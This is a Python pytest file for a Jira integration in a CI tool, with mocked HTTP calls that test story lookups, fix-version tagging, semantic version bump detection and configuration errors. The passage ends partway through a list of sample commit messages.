| 30.781553 | 82 | 0.297429 | 314 | 6,341 | 5.996815 | 0.187898 | 0.172597 | 0.265534 | 0.162507 | 0.839087 | 0.839087 | 0.839087 | 0.817313 | 0.817313 | 0.640467 | 0 | 0.133574 | 0.56316 | 6,341 | 205 | 83 | 30.931707 | 0.546209 | 0 | 0 | 0.477833 | 0 | 0 | 0.249961 | 0.011355 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004926 | false | 0 | 0.004926 | 0 | 0.014778 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3017f059d9529fe37a02bd26bde5213af4607afe | 45,806 | py | Python | tests/projecttracking/jira/test_jira.py | jander99/flow | 33c418547e3693bf277fd6d089d5f3242c83e14a | [
"Apache-2.0"
] | 36 | 2017-12-09T01:12:58.000Z | 2021-07-23T22:03:05.000Z | tests/projecttracking/jira/test_jira.py | jander99/flow | 33c418547e3693bf277fd6d089d5f3242c83e14a | [
"Apache-2.0"
] | 27 | 2018-02-09T01:13:13.000Z | 2021-07-28T12:44:39.000Z | tests/projecttracking/jira/test_jira.py | jander99/flow | 33c418547e3693bf277fd6d089d5f3242c83e14a | [
"Apache-2.0"
] | 42 | 2017-12-11T15:58:24.000Z | 2022-01-19T21:42:33.000Z | import base64
import configparser
import json
import os
from unittest.mock import MagicMock
from unittest.mock import Mock
from unittest.mock import patch
from unittest.mock import call
from unittest.mock import ANY
import pytest
from flow.projecttracking.jira.jira import Jira
from flow.buildconfig import BuildConfig
mock_build_config_dict = {
"projectInfo": {
"name": "testproject"
},
"projectTracking": {
"jira": {
"projectKey": "TEST"
}
},
"environments": {
"unittest": {
"artifactCategory": "release"
}
},
"slack": {
"botName": "Flow",
"emoji": ":robot_face:",
"channel": "#spigot-ci"
}
}
mock_build_config_dict_multi_projects = {
"projectInfo": {
"name": "testproject"
},
"projectTracking": {
"jira": {
"projectKeys": ["TEST", "TEST2"]
}
},
"environments": {
"unittest": {
"artifactCategory": "release"
}
},
"slack": {
"botName": "Flow",
"emoji": ":robot_face:",
"channel": "#spigot-ci"
}
}
mock_build_config_missing_jira_dict = {
"projectInfo": {
"name": "testproject"
},
"environments": {
"unittest": {
"artifactCategory": "release"
}
},
"slack": {
"botName": "Flow",
"emoji": ":robot_face:",
"channel": "#spigot-ci"
}
}
mock_build_config_missing_project_id_dict = {
"projectInfo": {
"name": "testproject"
},
"projectTracking": {
"jira": {
}
},
"environments": {
"unittest": {
"artifactCategory": "release"
}
},
"slack": {
"botName": "Flow",
"emoji": ":robot_face:",
"channel": "#spigot-ci"
}
}
mock_build_config_dict_both_project_ids = {
"projectInfo": {
"name": "testproject"
},
"projectTracking": {
"jira": {
"projectKey": "TEST",
"projectKeys": ["TEST", "TEST2"]
}
},
"environments": {
"unittest": {
"artifactCategory": "release"
}
},
"slack": {
"botName": "Flow",
"emoji": ":robot_face:",
"channel": "#spigot-ci"
}
}
mock_setting_ini = """
[jira]
url = https://thd.atlassian.net
"""
def mock_get_multiple_project_story_details_response(*args, **kwargs):
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_stories_bug.json", 'r') as myfile:
jira_data = myfile.read()
_response_mock = Mock()
_response_mock.text = jira_data
if args[0] == 'http://happy.happy.joy.joy/rest/api/3/issue/TEST-123':
_response_mock.status_code = 200
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/issue/TEST-456':
_response_mock.status_code = 200
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/issue/TEST-468':
_response_mock.text = ''
_response_mock.status_code = 404
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/issue/TEST2-123':
_response_mock.status_code = 200
else:
_response_mock.text = []
_response_mock.status_code = 500
return _response_mock
def mock_get_multiple_project_labels_response(*args, **kwargs):
_response_mock = Mock()
_response_mock.text = ''
if args[0] == 'http://happy.happy.joy.joy/rest/api/3/issue/TEST-123':
_response_mock.status_code = 204
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/issue/TEST2-123':
_response_mock.status_code = 404
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/issue/TEST-456':
_response_mock.status_code = 404
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/issue/TEST2-456':
_response_mock.status_code = 204
else:
_response_mock.status_code = 500
return _response_mock
def mock_get_multiple_project_ids_response(*args, **kwargs):
_response_mock = Mock()
_response_mock.text = ''
if args[0] == 'http://happy.happy.joy.joy/rest/api/3/project/TEST':
project_data = {
"id": "123456",
"self": "http://happy.happy.joy.joy/rest/api/3/project/fake",
"key": "TEST"
}
_response_mock.text = json.dumps(project_data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
_response_mock.status_code = 200
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/project/123456':
project_data = {
"id": "123456",
"self": "http://happy.happy.joy.joy/rest/api/3/project/fake",
"key": "TEST"
}
_response_mock.text = json.dumps(project_data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
_response_mock.status_code = 200
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/project/TEST2':
project_data = {
"id": "1234567",
"self": "http://happy.happy.joy.joy/rest/api/3/project/fake",
"key": "TEST2"
}
_response_mock.text = json.dumps(project_data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
_response_mock.status_code = 200
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/project/1234567':
project_data = {
"id": "1234567",
"self": "http://happy.happy.joy.joy/rest/api/3/project/fake",
"key": "TEST2"
}
_response_mock.text = json.dumps(project_data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
_response_mock.status_code = 200
else:
project_data = {
"errorMessage": [
"No project could be found with key/id"
],
"errors": {}
}
_response_mock.text = json.dumps(project_data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
_response_mock.status_code = 404
print(_response_mock)
return _response_mock
def mock_get_project_versions(*args, **kwargs):
_response_mock = Mock()
_response_mock.text = ''
if args[0] == 'http://happy.happy.joy.joy/rest/api/3/project/TEST/versions':
project_data = [
{
"id": "11123",
"self": "http://happy.happy.joy.joy/rest/api/3/version/11123",
"name": "testproject-v0.1"
},
{
"id": "11124",
"self": "http://happy.happy.joy.joy/rest/api/3/version/11124",
"name": "testproject-v0.2"
}
]
_response_mock.text = json.dumps(project_data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
_response_mock.status_code = 200
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/project/123456/versions':
project_data = [
{
"id": "11123",
"self": "http://happy.happy.joy.joy/rest/api/3/version/11123",
"name": "testproject-v0.1"
},
{
"id": "11124",
"self": "http://happy.happy.joy.joy/rest/api/3/version/11124",
"name": "testproject-v0.2"
}
]
_response_mock.text = json.dumps(project_data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
_response_mock.status_code = 200
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/project/TEST2/versions':
project_data = [
{
"id": "11223",
"self": "http://happy.happy.joy.joy/rest/api/3/version/11223",
"name": "testproject-v0.9"
},
{
"id": "11224",
"self": "http://happy.happy.joy.joy/rest/api/3/version/11224",
"name": "testproject-v1.0"
}
]
_response_mock.text = json.dumps(project_data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
_response_mock.status_code = 200
elif args[0] == 'http://happy.happy.joy.joy/rest/api/3/project/1234567/versions':
project_data = [
{
"id": "11223",
"self": "http://happy.happy.joy.joy/rest/api/3/version/11223",
"name": "testproject-v0.9"
},
{
"id": "11224",
"self": "http://happy.happy.joy.joy/rest/api/3/version/11224",
"name": "testproject-v1.0"
}
]
_response_mock.text = json.dumps(project_data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
_response_mock.status_code = 200
else:
project_data = {
"errorMessage": [
"No project could be found with key/id"
],
"errors": {}
}
_response_mock.text = json.dumps(project_data, default=lambda o: o.__dict__, sort_keys=False, indent=4)
_response_mock.status_code = 404
print(_response_mock)
return _response_mock
def test_no_initialize_object(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
_b.settings
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
timeout = 30
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_projects.json", 'r') as myfile:
jira_project_data = json.loads(myfile.read())
jira_project = json.dumps(jira_project_data["projects"][0], default=lambda o: o.__dict__, sort_keys=False, indent=4)
mock_request.return_value.text = jira_project
mock_request.return_value.status_code = 200
_jira = Jira(config_override=_b)
assert _jira is not None
def test_get_details_for_all_stories(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
timeout = 30
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_stories_bug.json", 'r') as myfile:
jira_data = myfile.read()
with open(current_test_directory + "/jira_projects.json", 'r') as myfile:
jira_project_data = json.loads(myfile.read())
jira_project = json.dumps(jira_project_data["projects"][0], default=lambda o: o.__dict__, sort_keys=False, indent=4)
mock_request.return_value.text = jira_project
mock_request.return_value.status_code = 200
_jira = Jira(config_override=_b)
mock_request.return_value.text = jira_data
mock_request.return_value.status_code = 200
story_details = _jira.get_details_for_all_stories(story_list=["TEST-123", "TEST-456"])
mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
headers=headers, timeout=timeout)
mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-456',
headers=headers, timeout=timeout)
assert story_details[0] == json.loads(jira_data)
def test_get_details_for_all_stories_for_multiple_projects(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict_multi_projects['environments']['unittest']
_b.json_config = mock_build_config_dict_multi_projects
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
timeout = 30
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_stories_bug.json", 'r') as myfile:
jira_data = myfile.read()
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
mock_request.side_effect = mock_get_multiple_project_story_details_response
story_details = _jira.get_details_for_all_stories(story_list=["TEST-123", "TEST-456", "TEST-468", "TEST2-123"])
# assert mock_request.call_counts == 4
mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
headers=headers, timeout=timeout)
mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-456',
headers=headers, timeout=timeout)
mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-468',
headers=headers, timeout=timeout)
mock_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST2-123',
headers=headers, timeout=timeout)
assert story_details[0] == json.loads(jira_data)
def test_tag_stories_in_commit(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.project_name = mock_build_config_dict['projectInfo']['name']
_b.version_number = 'v1.0'
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_get_request, patch('requests.post') as mock_post_request, patch('requests.put') as mock_put_request:
basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
timeout = 30
project = {
"projectId" : "123456",
"name": "testproject-v1.0"
}
version = {
"update": {
"fixVersions": [
{
"add": {
"name": "testproject-v1.0"
}
}
]
}
}
mock_get_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
mock_get_request.side_effect = mock_get_project_versions
mock_post_request.return_value.text = ''
mock_post_request.return_value.status_code = 201
mock_put_request.return_value.text = ''
mock_put_request.return_value.status_code = 204
mock_get_calls = [
call('http://happy.happy.joy.joy/rest/api/3/project/TEST',
headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/project/123456/versions',
headers=headers, timeout=timeout)
]
_jira.tag_stories_in_commit(story_list=['TEST-123', 'TEST-456'])
mock_get_request.assert_has_calls(mock_get_calls)
mock_post_request.assert_called_once_with('http://happy.happy.joy.joy/rest/api/3/version',
ANY, headers=headers, timeout=timeout)
mock_post_request_calls = mock_post_request.call_args_list
call_args, call_kwargs = mock_post_request_calls[0]
post_data_arg = call_args[1]
assert project == json.loads(post_data_arg)
mock_put_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
ANY, headers=headers, timeout=timeout)
mock_put_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-456',
ANY, headers=headers, timeout=timeout)
mock_put_request_calls = mock_put_request.call_args_list
for i, put_call in enumerate(mock_put_request_calls):
call_args, call_kwargs = put_call
put_data_arg = call_args[1]
assert version == json.loads(put_data_arg)
def test_tag_stories_in_commit_with_existing_version(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.project_name = mock_build_config_dict['projectInfo']['name']
_b.version_number = 'v0.1'
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_get_request, patch('requests.post') as mock_post_request, patch('requests.put') as mock_put_request:
basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
timeout = 30
project = {
"projectId" : "123456",
"name": "testproject-v0.1"
}
version = {
"update": {
"fixVersions": [
{
"add": {
"name": "testproject-v0.1"
}
}
]
}
}
mock_get_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
mock_get_request.side_effect = mock_get_project_versions
mock_post_request.return_value.text = ''
mock_post_request.return_value.status_code = 201
mock_put_request.return_value.text = ''
mock_put_request.return_value.status_code = 204
mock_get_calls = [
call('http://happy.happy.joy.joy/rest/api/3/project/TEST',
headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/project/123456/versions',
headers=headers, timeout=timeout)
]
_jira.tag_stories_in_commit(story_list=['TEST-123', 'TEST-456'])
mock_get_request.assert_has_calls(mock_get_calls)
mock_post_request.assert_not_called()
mock_put_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
ANY, headers=headers, timeout=timeout)
mock_put_request.assert_any_call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-456',
ANY, headers=headers, timeout=timeout)
mock_put_request_calls = mock_put_request.call_args_list
for i, put_call in enumerate(mock_put_request_calls):
call_args, call_kwargs = put_call
put_data_arg = call_args[1]
assert version == json.loads(put_data_arg)
def test_tag_stories_in_commit_for_multiple_projects(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict_multi_projects['environments']['unittest']
_b.project_name = mock_build_config_dict_multi_projects['projectInfo']['name']
_b.version_number = 'v1.1'
_b.json_config = mock_build_config_dict_multi_projects
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_get_request, patch('requests.post') as mock_post_request, patch('requests.put') as mock_put_request:
basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
timeout = 30
project = {
"projectId" : "123456",
"name": "testproject-v1.1"
}
project2 = {
"projectId" : "1234567",
"name": "testproject-v1.1"
}
version = {
"update": {
"fixVersions": [
{
"add": {
"name": "testproject-v1.1"
}
}
]
}
}
mock_get_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
mock_get_request.side_effect = mock_get_project_versions
mock_post_request.return_value.text = ''
mock_post_request.return_value.status_code = 201
mock_put_request.return_value.text = ''
mock_put_request.return_value.status_code = 204
mock_put_request.side_effect = mock_get_multiple_project_labels_response
mock_get_calls = [
call('http://happy.happy.joy.joy/rest/api/3/project/TEST',
headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/project/TEST2',
headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/project/123456/versions',
headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/project/1234567/versions',
headers=headers, timeout=timeout)
]
mock_post_calls = [
call('http://happy.happy.joy.joy/rest/api/3/version',
ANY, headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/version',
ANY, headers=headers, timeout=timeout)
]
mock_put_calls = [
call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
ANY, headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/issue/TEST2-456',
ANY, headers=headers, timeout=timeout)
]
_jira.tag_stories_in_commit(story_list=['TEST-123', 'TEST2-456'])
mock_get_request.assert_has_calls(mock_get_calls, any_order=True)
mock_post_request.assert_has_calls(mock_post_calls)
mock_post_request_calls = mock_post_request.call_args_list
call_args, call_kwargs = mock_post_request_calls[0]
post_data_arg = call_args[1]
assert project == json.loads(post_data_arg)
call_args2, call_kwargs2 = mock_post_request_calls[1]
post_data_arg2 = call_args2[1]
assert project2 == json.loads(post_data_arg2)
mock_put_request.assert_has_calls(mock_put_calls)
mock_put_request_calls = mock_put_request.call_args_list
for i, put_call in enumerate(mock_put_request_calls):
call_args, call_kwargs = put_call
put_data_arg = call_args[1]
assert version == json.loads(put_data_arg)
def test_tag_stories_in_commit_for_multiple_projects_when_version_exists_on_one_project(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict_multi_projects['environments']['unittest']
_b.project_name = mock_build_config_dict_multi_projects['projectInfo']['name']
_b.version_number = 'v1.0'
_b.json_config = mock_build_config_dict_multi_projects
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_get_request, patch('requests.post') as mock_post_request, patch('requests.put') as mock_put_request:
basic_auth = base64.b64encode("{0}:{1}".format('flow_tester@homedepot.com', 'fake_token').encode('ascii')).decode('ascii')
headers = {'Content-type': 'application/json', 'Accept': 'application/json', 'Authorization': 'Basic {0}'.format(basic_auth)}
timeout = 30
project = {
"projectId" : "123456",
"name": "testproject-v1.0"
}
project2 = {
"projectId" : "1234567",
"name": "testproject-v1.0"
}
version = {
"update": {
"fixVersions": [
{
"add": {
"name": "testproject-v1.0"
}
}
]
}
}
mock_get_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
mock_get_request.side_effect = mock_get_project_versions
mock_post_request.return_value.text = ''
mock_post_request.return_value.status_code = 201
mock_put_request.return_value.text = ''
mock_put_request.return_value.status_code = 204
mock_put_request.side_effect = mock_get_multiple_project_labels_response
mock_get_calls = [
call('http://happy.happy.joy.joy/rest/api/3/project/TEST',
headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/project/TEST2',
headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/project/123456/versions',
headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/project/1234567/versions',
headers=headers, timeout=timeout)
]
mock_post_calls = [
call('http://happy.happy.joy.joy/rest/api/3/version',
ANY, headers=headers, timeout=timeout)
]
mock_put_calls = [
call('http://happy.happy.joy.joy/rest/api/3/issue/TEST-123',
ANY, headers=headers, timeout=timeout),
call('http://happy.happy.joy.joy/rest/api/3/issue/TEST2-456',
ANY, headers=headers, timeout=timeout)
]
_jira.tag_stories_in_commit(story_list=['TEST-123', 'TEST2-456'])
mock_get_request.assert_has_calls(mock_get_calls, any_order=True)
mock_post_request.assert_has_calls(mock_post_calls)
assert mock_post_request.call_count == 1
mock_post_request_calls = mock_post_request.call_args_list
call_args, call_kwargs = mock_post_request_calls[0]
post_data_arg = call_args[1]
assert project == json.loads(post_data_arg)
mock_put_request.assert_has_calls(mock_put_calls)
mock_put_request_calls = mock_put_request.call_args_list
for i, put_call in enumerate(mock_put_request_calls):
call_args, call_kwargs = put_call
put_data_arg = call_args[1]
assert version == json.loads(put_data_arg)
def test_story_bump_bug(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_stories_bug.json", 'r') as myfile:
jira_json_data = json.loads(myfile.read())
bump_type = _jira.determine_semantic_version_bump(story_details=jira_json_data["stories"])
assert bump_type == "bug"
def test_story_bump_minor(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_stories_minor.json", 'r') as myfile:
jira_json_data = json.loads(myfile.read())
bump_type = _jira.determine_semantic_version_bump(story_details=jira_json_data["stories"])
assert bump_type == "minor"
def test_story_bump_major(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
current_test_directory = os.path.dirname(os.path.realpath(__file__))
with open(current_test_directory + "/jira_stories_major.json", 'r') as myfile:
jira_json_data = json.loads(myfile.read())
bump_type = _jira.determine_semantic_version_bump(story_details=jira_json_data["stories"])
assert bump_type == "major"
def test_init_for_multiple_projects_too_many_project_id_keys(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict_both_project_ids['environments']['unittest']
_b.json_config = mock_build_config_dict_both_project_ids
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira(config_override=_b)
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"The build config may only contain 'projectKey' for single project key"
" or 'projectKeys' containing an array of project keys", 'ERROR')
def test_init_missing_jira(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.json_config = mock_build_config_missing_jira_dict
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira(config_override=_b)
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"The build config associated with projectTracking is "
"missing key 'projectTracking'", 'ERROR')
def test_init_missing_jira_project_key(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.json_config = mock_build_config_missing_project_id_dict
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira(config_override=_b)
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"The build config associated with projectTracking is missing key "
"'projectKey'",
'ERROR')
def test_init_missing_jira_url(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
_b.settings = parser
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira(config_override=_b)
mock_printmsg_fn.assert_called_with('Jira', '__init__',
'No jira url found in buildConfig or settings.ini.', 'ERROR')
def test_init_missing_jira_url_but_contains_jira_in_config_parser(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
_b.settings = parser
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira(config_override=_b)
mock_printmsg_fn.assert_called_with('Jira', '__init__',
'No jira url found in buildConfig or settings.ini.', 'ERROR')
def test_init_missing_all_env_variable(monkeypatch):
if os.getenv('JIRA_USER'):
monkeypatch.delenv('JIRA_USER')
if os.getenv('JIRA_TOKEN'):
monkeypatch.delenv('JIRA_TOKEN')
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira()
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"No jira user, jira token found in environment. Did you define environment variables 'JIRA_USER' and 'JIRA_TOKEN'?",
'ERROR')
def test_init_missing_user_env_variable(monkeypatch):
if os.getenv('JIRA_USER'):
monkeypatch.delenv('JIRA_USER')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira()
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"No jira user found in environment. Did you define environment variable 'JIRA_USER'?",
'ERROR')
def test_init_missing_token_env_variable(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
if os.getenv('JIRA_TOKEN'):
monkeypatch.delenv('JIRA_TOKEN')
with patch('flow.utils.commons.print_msg') as mock_printmsg_fn:
with pytest.raises(SystemExit):
Jira()
mock_printmsg_fn.assert_called_with('Jira', '__init__',
"No jira token found in environment. Did you define environment variable 'JIRA_TOKEN'?",
'ERROR')
def test_extract_story_id_with_empty_list(monkeypatch):
monkeypatch.setenv('JIRA_USER', 'flow_tester@homedepot.com')
monkeypatch.setenv('JIRA_TOKEN', 'fake_token')
_b = MagicMock(BuildConfig)
_b.build_env_info = mock_build_config_dict['environments']['unittest']
_b.json_config = mock_build_config_dict
parser = configparser.ConfigParser()
parser.add_section('jira')
parser.set('jira', 'url', 'http://happy.happy.joy.joy')
_b.settings = parser
with patch('requests.get') as mock_request:
mock_request.side_effect = mock_get_multiple_project_ids_response
_jira = Jira(config_override=_b)
story_list = _jira.extract_story_id_from_commit_messages([])
assert len(story_list) == 0
commit_example = [
"223342f Adding ability to specify artifactory user [TEST-100]",
"4326d00 Adding slack channel option for errors [TEST-102]",
